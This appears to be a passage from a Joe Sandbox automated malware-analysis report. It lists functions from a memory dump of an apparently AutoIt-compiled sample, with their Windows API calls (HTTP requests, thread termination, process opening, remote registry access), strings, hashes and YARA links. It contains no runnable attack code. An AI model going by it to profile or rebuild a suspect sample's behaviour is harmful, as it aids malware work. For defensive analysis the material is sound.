Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 7906c470f90f9834ebd73270715b71abc47ba6f0190c9d26cd013df11eff0750
Instruction ID: 8cca1c44bc0954c9463effe5e77c7d859c70f214c4c79512ce4e1636cc8b6a3a
Opcode Fuzzy Hash: 7906c470f90f9834ebd73270715b71abc47ba6f0190c9d26cd013df11eff0750
Instruction Fuzzy Hash: A0F03032641258BBE7615B929C0DFEF7B7CFFC6B11F00015AFA15D1150DBB11A118AB5

Function 007D77EB Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 007D77FE
EnterCriticalSection.KERNEL32(?,?,0077C2B6,?,?), ref: 007D780F
TerminateThread.KERNEL32(00000000,000001F6,?,0077C2B6,?,?), ref: 007D781C
WaitForSingleObject.KERNEL32(00000000,000003E8,?,0077C2B6,?,?), ref: 007D7829

Part of subcall function 007D71F0: CloseHandle.KERNEL32(00000000,?,007D7836,?,0077C2B6,?,?), ref: 007D71FA

InterlockedExchange.KERNEL32(?,000001F6), ref: 007D783C
LeaveCriticalSection.KERNEL32(?,?,0077C2B6,?,?), ref: 007D7843

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: d715789f3f98c0a01735db32f6ee3792c6f93ee6c3c5f5819861539c31653bd4
Instruction ID: 5476ae84883a2dd1592a93d0c049a950f638cd62aebcda84c0a9300ec2875e43
Opcode Fuzzy Hash: d715789f3f98c0a01735db32f6ee3792c6f93ee6c3c5f5819861539c31653bd4
Instruction Fuzzy Hash: A0F05832945212AFD7962B64EC8DBAB773AFF49302F151422F202A51B1DBB95801DF60

Function 007C954A Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 007C9555
UnloadUserProfile.USERENV(?,?), ref: 007C9561
CloseHandle.KERNEL32(?), ref: 007C956A
CloseHandle.KERNEL32(?), ref: 007C9572
GetProcessHeap.KERNEL32(00000000,?), ref: 007C957B
HeapFree.KERNEL32(00000000), ref: 007C9582

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: fc111f7fb4d38e5bc9b6e6f35d05f26caa7d4b800e7d44aeb3ec5943e620658b
Instruction ID: 1c18c533840e45a4d1678bc5e08cf5ee2995cca8ce08a7efe82ba71e3cbb5aa3
Opcode Fuzzy Hash: fc111f7fb4d38e5bc9b6e6f35d05f26caa7d4b800e7d44aeb3ec5943e620658b
Instruction Fuzzy Hash: EEE0E536104101BBDB821FE1EC0CA5ABF39FF49722F104220F21981170CB32A460DF90

Function 007E8CD7 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 007E8CFD
CharUpperBuffW.USER32(?,?), ref: 007E8E0C
VariantClear.OLEAUT32(?), ref: 007E8F84

Part of subcall function 007D7B1D: VariantInit.OLEAUT32(00000000), ref: 007D7B5D
Part of subcall function 007D7B1D: VariantCopy.OLEAUT32(00000000,?), ref: 007D7B66
Part of subcall function 007D7B1D: VariantClear.OLEAUT32(00000000), ref: 007D7B72

Strings

AUTOIT.ERROR, xrefs: 007E8E12
Incorrect Parameter format, xrefs: 007E8D35, 007E8EF7

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 803fb6c19a65b4aa83622efa83862c80e339162077ffd782aa658cb4adb6f275
Instruction ID: 17837e38d7c7b29e99e7ea490574ea1593b22796bdacbab3e7e1fefceafb1e5f
Opcode Fuzzy Hash: 803fb6c19a65b4aa83622efa83862c80e339162077ffd782aa658cb4adb6f275
Instruction Fuzzy Hash: 7A919C70604341DFCB50DF25C88495ABBF5EF89354F04896EF89A8B3A2DB35E905CB92

Function 007D323D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0078436A: _wcscpy.LIBCMT ref: 0078438D

_memset.LIBCMT ref: 007D332E
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007D335D
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007D3410
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 007D343E

Strings

0, xrefs: 007D331A

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: da8799c35751f6b9094025d13f8ddd35c40984ded4fe2123d5fd6221e5f14a33
Instruction ID: 7eec3bb623d783c658b319bd703807979a610ce5aa2e01080a28998a698e7f32
Opcode Fuzzy Hash: da8799c35751f6b9094025d13f8ddd35c40984ded4fe2123d5fd6221e5f14a33
Instruction Fuzzy Hash: DF51CF716083419BD725AB28D94567BB7F8AF45320F040A2EF895E3291DB7CDA44CB93

Function 007D2EFA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007D2F67
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 007D2F83
DeleteMenu.USER32(?,00000007,00000000), ref: 007D2FC9
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00837890,00000000), ref: 007D3012

Strings

0, xrefs: 007D2F5C

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 6cc560d08c91ae11037ead9d25cba6513fbf880cb1dc9b27c8c7496660bfb030
Instruction ID: 560110a9e3c82988b890104215af3ea2ce8989b882a7ffd778fd1fd826698a15
Opcode Fuzzy Hash: 6cc560d08c91ae11037ead9d25cba6513fbf880cb1dc9b27c8c7496660bfb030
Instruction Fuzzy Hash: 01418071208341DFD720DF24C888B5ABBF9AF84310F144A1EF5A5A7392D778EA06CB52

Function 007C9A48 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77

Part of subcall function 007CB79A: GetClassNameW.USER32(?,?,000000FF), ref: 007CB7BD

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 007C9ACC
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 007C9ADF
SendMessageW.USER32(?,00000189,?,00000000), ref: 007C9B0F

Part of subcall function 00781821: _memmove.LIBCMT ref: 0078185B

Strings

ListBox, xrefs: 007C9A8B
ComboBox, xrefs: 007C9A56

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: 34ea4096258d236899dd0bf2c64ed22db51a5544d07af3accda4d01ca87fabac
Instruction ID: 3d8222e7b898e7b39d448a323faacdc9df7e92e0089937b178d7b4026c9e320b
Opcode Fuzzy Hash: 34ea4096258d236899dd0bf2c64ed22db51a5544d07af3accda4d01ca87fabac
Instruction Fuzzy Hash: 9721F0B1940104BEDB58ABA0EC4AEFEBB6DEF51360F50421DF925932D0DE3D4D0A9B20

Function 007E1EF9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007E1F18
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007E1F3E
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 007E1F6E
InternetCloseHandle.WININET(00000000), ref: 007E1FB5

Part of subcall function 007E2B4F: GetLastError.KERNEL32(?,?,007E1EE3,00000000,00000000,00000001), ref: 007E2B64
Part of subcall function 007E2B4F: SetEvent.KERNEL32(?,?,007E1EE3,00000000,00000000,00000001), ref: 007E2B79

Strings

, xrefs: 007E1F5F

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 171b68e736c42afeffaa9c5141dacc26f471b30609df35f3cae4171edf2e49ec
Instruction ID: a45ab5063406f9ac1aa5d0cd8a42a485007cfbd1f21414ebad168b534a9f9523
Opcode Fuzzy Hash: 171b68e736c42afeffaa9c5141dacc26f471b30609df35f3cae4171edf2e49ec
Instruction Fuzzy Hash: 0221BEB1606248BEEB119F658C8AFBF77ADFB4C744F10011AF405A6240EB399D059BA1

Function 007F6A0C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00772111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0077214F
Part of subcall function 00772111: GetStockObject.GDI32(00000011), ref: 00772163
Part of subcall function 00772111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0077216D

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 007F6A86
LoadLibraryW.KERNEL32(?), ref: 007F6A8D
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 007F6AA2
DestroyWindow.USER32(?), ref: 007F6AAA

Strings

SysAnimate32, xrefs: 007F6A61

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 74c5101f6c38d6dc54d7ab2c5076f664614bc402f8f7f367e6926f9c3049a0ad
Instruction ID: d44a591fbaa8a545450d22c2d4ff12bb8621d1a68fe3dd3a4e0932d43a4ff14c
Opcode Fuzzy Hash: 74c5101f6c38d6dc54d7ab2c5076f664614bc402f8f7f367e6926f9c3049a0ad
Instruction Fuzzy Hash: 57218B71200209AFEF108E689C81EBB77A9FB59324F10C619FB50A2290D739DC51AB60

Function 007D7357 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 007D7377
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007D73AA
GetStdHandle.KERNEL32(0000000C), ref: 007D73BC
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 007D73F6

Strings

nul, xrefs: 007D73F1

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 61d9a0b3d52d4f9d1568e98db24b09c331115bcc38a4722b66e79fd166381748
Instruction ID: 243fccf0defaad787e1ff41312ee3b095f6cb118e2383de91fe6fe1aa892f7fe
Opcode Fuzzy Hash: 61d9a0b3d52d4f9d1568e98db24b09c331115bcc38a4722b66e79fd166381748
Instruction Fuzzy Hash: 7421607150834AABDB249F69DC49A9A7BB4BF44720F204A1AFCA1D73E0E774D850DB90

Function 007D7425 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 007D7444
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007D7476
GetStdHandle.KERNEL32(000000F6), ref: 007D7487
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 007D74C1

Strings

nul, xrefs: 007D74BC

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: e1768a848a39da65903b48f03b20ac4f5ea71a677d224b23184dd492c61e006d
Instruction ID: 722adb2c05bd204612e3f505865db5f1451be7dcce47383874bf3877fedad77f
Opcode Fuzzy Hash: e1768a848a39da65903b48f03b20ac4f5ea71a677d224b23184dd492c61e006d
Instruction Fuzzy Hash: 9821C1316083469BDB259F689C49E9A7BB8BF45730F200B0AFDA0D73D0EB749840CB50

Function 007DB283 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 007DB297
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 007DB2EB
__swprintf.LIBCMT ref: 007DB304
SetErrorMode.KERNEL32(00000000,00000001,00000000,00800980), ref: 007DB342

Strings

%lu, xrefs: 007DB2FE

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 5f1ae6cb0bc2053e7e31d6d3399683ec71ec9c28e7967eb8a607798f28dba573
Instruction ID: 9de5a25b85a3a5f66c640d987f3ac263227b450c41b8531175a767f5fa29de47
Opcode Fuzzy Hash: 5f1ae6cb0bc2053e7e31d6d3399683ec71ec9c28e7967eb8a607798f28dba573
Instruction Fuzzy Hash: 3C214C34A00108EFCB10DFA5C849EAEB7B8EF89704B108069F909D7352DB35AA45DB61

Function 007CAC05 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00781821: _memmove.LIBCMT ref: 0078185B

Part of subcall function 007CAA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 007CAA6F
Part of subcall function 007CAA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 007CAA82
Part of subcall function 007CAA52: GetCurrentThreadId.KERNEL32 ref: 007CAA89
Part of subcall function 007CAA52: AttachThreadInput.USER32(00000000), ref: 007CAA90

GetFocus.USER32 ref: 007CAC2A

Part of subcall function 007CAA9B: GetParent.USER32(?), ref: 007CAAA9

GetClassNameW.USER32(?,?,00000100), ref: 007CAC73
EnumChildWindows.USER32(?,007CACEB), ref: 007CAC9B
__swprintf.LIBCMT ref: 007CACB5

Strings

%s%d, xrefs: 007CACAF

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
String ID: %s%d
API String ID: 1941087503-1110647743
Opcode ID: 39848d20d936fd7690aa978b11bb3f997ce34dc41046bd210e3af57bf3a4d42a
Instruction ID: d6bb4337a87dce2e43770e843b7b62ce1dae7f9623f94833ec9673dec45b823f
Opcode Fuzzy Hash: 39848d20d936fd7690aa978b11bb3f997ce34dc41046bd210e3af57bf3a4d42a
Instruction Fuzzy Hash: DA11CD75600208BBDF11BFA09D8AFAA376CAB44315F0080ADFE18AA182CA7959459B71

Function 007D22E7 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 007D2318

Strings

REMOVE, xrefs: 007D231E
KEYS, xrefs: 007D232F
EXISTS, xrefs: 007D2340
APPEND, xrefs: 007D2351

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: ba5c59a7d334c6add3b63a407c910c2fdbb9e5133222c8372b842ef4685c138d
Instruction ID: 9e6b0eafa10e2464658ebe5f0265e469944919d7d19ac5f0d6303183ace31c69
Opcode Fuzzy Hash: ba5c59a7d334c6add3b63a407c910c2fdbb9e5133222c8372b842ef4685c138d
Instruction Fuzzy Hash: 75117C30A10128DFCF04EFA4E8504EEB3B8FF25304B508069D814A7352EB3A5D5BCB90

Function 007EF23E Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 007EF2F0
GetProcessIoCounters.KERNEL32(00000000,?), ref: 007EF320
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 007EF453
CloseHandle.KERNEL32(?), ref: 007EF4D4

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 6b9536e3d3115713488ed6c88fa47d870a5de3568b0c75e05c8d39deab5e4dce
Instruction ID: 1569494d1650a4e1dd342d5c0a5046135efb8eac11458d9866dead4932646c42
Opcode Fuzzy Hash: 6b9536e3d3115713488ed6c88fa47d870a5de3568b0c75e05c8d39deab5e4dce
Instruction Fuzzy Hash: D1816071604700DFDB20EF29D886F2AB7E5AF48750F14891DFA99DB2D2D7B4AC408B91

Function 007F0697 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77

Part of subcall function 007F147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007F040D,?,?), ref: 007F1491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007F075D
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007F079C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 007F07E3
RegCloseKey.ADVAPI32(?,?), ref: 007F080F
RegCloseKey.ADVAPI32(00000000), ref: 007F081C

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: cd96a08848bed3bf8ba58464cb42b6a385b80f14333f07dbeb6c4dbf01b3d6c5
Instruction ID: 2b28f44246df45dfb5ab319df07ab67beb04705bf26f21b3e8c4404ba95fbe12
Opcode Fuzzy Hash: cd96a08848bed3bf8ba58464cb42b6a385b80f14333f07dbeb6c4dbf01b3d6c5
Instruction Fuzzy Hash: CB513A71208208EFD714EF64C885F7AB7E9BF84314F44891DF59587292DB38E905CBA2

Function 007DEBB4 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 007DEC62
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 007DEC8B
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 007DECCA

Part of subcall function 00774D37: __itow.LIBCMT ref: 00774D62
Part of subcall function 00774D37: __swprintf.LIBCMT ref: 00774DAC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 007DECEF
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 007DECF7

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
